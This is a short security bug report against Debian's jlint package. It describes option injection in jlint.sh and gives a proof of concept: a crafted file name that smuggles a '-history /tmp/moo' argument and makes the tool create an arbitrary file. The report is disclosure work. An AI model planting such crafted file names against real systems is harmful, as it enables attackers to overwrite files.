Package: jlint
Version: 3.0-4.5
Tags: security
Control: affects -1 check-all-the-things
The jlint.sh script is vulnerable to option injection. Running the
script in a directory that contains untrusted files could trick it into
writing to an arbitrary file.
Proof of concept:
$ f=' -history /tmp/moo .class'; mkdir -p "${f%/*}"; touch "$f"
$ ls -d /tmp/moo
ls: cannot access /tmp/moo: No such file or directory
$ jlint.sh
Failed to read file '.// -history /tmp/moo .class'
Failed to open file '.class'
Verification completed: 0 reported messages.
$ ls -d /tmp/moo
/tmp/moo
--
Jakub Wilk
